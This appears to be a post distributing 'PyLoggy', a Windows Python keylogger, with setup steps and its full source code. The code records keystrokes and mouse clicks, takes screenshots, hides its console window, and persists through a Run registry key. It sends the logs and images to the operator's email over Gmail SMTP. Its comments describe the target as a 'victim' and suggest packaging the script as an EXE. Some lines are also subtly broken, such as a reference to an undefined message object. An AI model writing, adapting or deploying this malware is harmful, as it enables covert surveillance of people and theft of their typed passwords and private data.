PyLoggy

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PyLoggy is simple and powerful Python keylogger that is able to log keystrokes, log mouse clicks, take screenshots and more! The tool will send the logs to your email every minute(you can change this).

Installation

  1. Clone it:
  2. Run it:
    Code:
    python PyLoggy.py
You can also convert PyLoggy to EXE using PyInstaller or any similar tool.

You can change the configuration settings by editing Python script. Settings can be found on line 28.

Code:
#!/usr/bin/python
# -*- coding: utf-8 -*-

"""
.d88888b oo dP
88. "' 88
`Y88888b. .d8888b. dP dP 88d888b. dP d8888P dP dP
`8b 88' `88 88 88 88' `88 88 88 88 88
d8' .8P 88. .88 88. .88 88 88 88 88 88. .88
Y88888P `8888P88 `88888P' dP dP dP dP `8888P88
88 .88
dP d8888P
"""

import sys
import win32api,pythoncom
import pyHook,os,time,random,smtplib,string,base64
from _winreg import *

global t,start_time,pics_names,yourgmail,yourgmailpass,sendto,interval

t="";pics_names=[]

 

#Note: You have to edit this part from sending the keylogger to the victim

#########Settings########

yourgmail="" #What is your gmail?
yourgmailpass="" #What is your gmail password
sendto="" #Where should I send the logs to? (any email address)
interval=60 #Time to wait before sending data to email (in seconds)

########################

try:

f = open('Logfile.txt', 'a')
f.close()
except:

f = open('Logfile.txt', 'w')
f.close()

 

def addStartup(): # this will add the file to the startup registry key
fp = os.path.dirname(os.path.realpath(__file__))
file_name = sys.argv[0].split('\\')[-1]
new_file_path = fp + '\\' + file_name
keyVal = r'Software\Microsoft\Windows\CurrentVersion\Run'
key2change = OpenKey(HKEY_CURRENT_USER, keyVal, 0, KEY_ALL_ACCESS)
SetValueEx(key2change, 'Im not a keylogger', 0, REG_SZ,
new_file_path)

 

def Hide():
import win32console
import win32gui
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)

addStartup()

Hide()

 

def ScreenShot():
global pics_names
import pyautogui
def generate_name():
return ''.join(random.choice(string.ascii_uppercase
+ string.digits) for _ in range(7))
name = str(generate_name())
pics_names.append(name)
pyautogui.screenshot().save(name + '.png')

 

def Mail_it(data, pics_names):
data = base64.b64encode(data)
data = 'New data from victim(Base64 encoded)\n' + data
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(yourgmail, yourgmailpass)
server.sendmail(yourgmail, sendto, data)
server.close()

for pic in pics_names:
data = base64.b64encode(open(pic, 'r+').read())
data = 'New pic data from victim(Base64 encoded)\n' + data
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(yourgmail, yourgmailpass)
server.sendmail(yourgmail, sendto, msg.as_string())
server.close()

 

def OnMouseEvent(event):
global yourgmail, yourgmailpass, sendto, interval
data = '\n[' + str(time.ctime().split(' ')[3]) + ']' \
+ ' WindowName : ' + str(event.WindowName)
data += '\n\tButton:' + str(event.MessageName)
data += '\n\tClicked in (Position):' + str(event.Position)
data += '\n===================='
global t, start_time, pics_names

t = t + data

if len(t) > 300:
ScreenShot()

if len(t) > 500:
f = open('Logfile.txt', 'a')
f.write(t)
f.close()
t = ''

if int(time.time() - start_time) == int(interval):
Mail_it(t, pics_names)
start_time = time.time()
t = ''

return True

 

def OnKeyboardEvent(event):
global yourgmail, yourgmailpass, sendto, interval
data = '\n[' + str(time.ctime().split(' ')[3]) + ']' \
+ ' WindowName : ' + str(event.WindowName)
data += '\n\tKeyboard key :' + str(event.Key)
data += '\n===================='
global t, start_time
t = t + data

if len(t) > 500:
f = open('Logfile.txt', 'a')
f.write(t)
f.close()
t = ''

if int(time.time() - start_time) == int(interval):
Mail_it(t, pics_names)
t = ''

return True

 

hook = pyHook.HookManager()

hook.KeyDown = OnKeyboardEvent

hook.MouseAllButtonsDown = OnMouseEvent

hook.HookKeyboard()

hook.HookMouse()

start_time = time.time()

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